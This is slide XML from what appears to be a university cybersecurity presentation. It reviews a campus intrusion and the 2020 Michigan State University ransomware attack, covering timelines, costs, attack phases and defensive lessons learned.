                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCDBD157-5091-6A48-8916-100B3DBB58F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intellectual Property Theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extortion (Ransomware)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Financial Fraud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Espionage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Revenge (The insider threat)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hacktivism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supply Chain Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2582437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8A42E-DD43-E447-9EED-C6FD7967FD7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>January Incident”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C899458D-9BC1-7E4A-A94F-CDF28F62A9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49116"/>
            <a:ext cx="9125406" cy="3717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97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1259-AB8E-6D43-8701-E25D4B7BCDD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>59 systems and a review of 2.5+ months of logs later...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1E7303F-3EB3-804F-96A1-8D8B9103A3C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Attack began with a student’s laptop that was compromised in mid-October.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Credentials stolen from that laptop were then used to access a system on campus in mid-November</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Attackers began to spread across multiple departments mostly undetected from mid-November until they attempted to spread to a system running FireEye on Jan 1st.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Along the way 59 systems compromised, 44 user accounts potentially compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A majority of these compromises were from 12/22 - 12/26 and then again on 1/1 - 1/4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1097859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0F37C-5DF2-E44D-B133-C0541F32F2CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Attackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54294B31-4E37-2948-AFD7-6A3EB77696E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A variety of skill level shows that this was a team (or someone who quickly went from 0 to 60 in their skillset) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically worked outside of normal working hours (higher activity after 5pm and a lot of activity over weekends/holiday)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A new C&amp;C infrastructure was setup by the attackers which was not seen in any external threat intel (why traditional network based defenses did not alert)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Our theory is their end goal was to compromise as many systems as possible and then ransomware them.  Thankfully we discovered them first.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2282023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3BF7-9D34-4140-B230-C656D6DCEE70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From a compromised system…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FB5D770-70AA-8E4B-BD8D-F8009CB10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24313"/>
            <a:ext cx="9364580" cy="2809374"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2372508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E090-8121-8D44-977A-E9961CE326D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From a compromised system…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ADC9F11-AA5B-B240-BF3D-C29E4DD11E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79" y="1900989"/>
            <a:ext cx="9132321" cy="3333235"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="596624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5EEF-688E-D844-A774-5D91B3DA68E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Lessons Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3E8ED55-03E9-D240-83DF-65492146EBC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Additional alerting/log review for the SOC to detect and respond faster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>New alerts created for internal SOC use, sharing alerts with departments, additional dashboarding, threat hunting, and alert tuning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>We need deeper visibility into systems to identify compromises</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FireEye alerted us to this as soon as the attacker connected to a system running FireEye</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FireEye roll out to all University-owned systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Windows 7 is still widely used in some areas of campus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Window 7 blocked from CAS/Duo 1/11, removed from AD 1/25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1014711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AD62-9439-F649-8B66-6D5F710A3FF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Lessons Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAD3820B-9CC5-DC4B-B8D8-290D0054D118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The need for advanced security awareness training for IT staff, specifically around Windows/AD system administration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>More auditing and enforcement of Windows/Active Directory best practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review of accounts/groups that comply with best practices, remove GPP passwords, more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Compromised domain-joined computer can introduce significant risk to AD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Improved monitoring and prevention with FireEye on AD-joined systems.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3852680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3A1E-B21B-D541-9E4A-D0B08E432483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MSU Ransomware attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAAEF136-D524-F544-B709-7727056E4754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://edscoop.com/michigan-state-university-ransomware-attack-shows-need-for-connection-between-it-teams/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=_Ay2jUxthfw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1960031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8841-6BE5-2447-87C1-E2E113E15AAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MSU Ransomware attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEA8FC0C-0EA4-3741-AEC5-B0047F57BAA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>A ransomware attack hit the Physics and Astronomy (PA) department at Michigan State University (MSU) in May 2020.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Several researchers were impacted in the aftermath of the attack, causing one to lose a year’s worth of research and others to lose months of time and research. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Additionally, PA systems were offline for most of the summer, and much of PA’s data was not recovered.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293766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4E6A-FFB6-0F49-BA4B-1899C06A797A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MSU Ransomware attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FF87EF3-22F9-444E-A3D0-99DC1A3B933F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>University leadership decided not to pay the $6 million ransom demand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The total remediation cost to the university was estimated to be $1,093,000. The costs included: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>IT response and recovery time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>PA staff and research time lost due to the shutdown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>legal bills</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>notification of identity theft risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>two years of credit monitoring and identity repair for personally identifiable information (PII) that was taken by the attackers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165091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Phases of an attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creating Persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expansion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Covering Tracks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The End Goal (exfiltration / causing damage)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10053680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4C-DB75-3249-812C-5AB70EE8E32C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack Timeline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3996EDBA-AC72-584C-9AFB-D9F6CC2278A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>May 23, 2020 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>- Initial compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>May 25 2020 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>-  The ransomware attack was detected late in the day (Memorial Day -- holiday) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>May 26 2020 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>- Incident response began at 2am</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2311692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6919-E4C0-4D46-A37A-FA3F4700B4C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Entry Point and What Came Next</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC2F0D83-2A90-954F-A085-ACA074253183}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
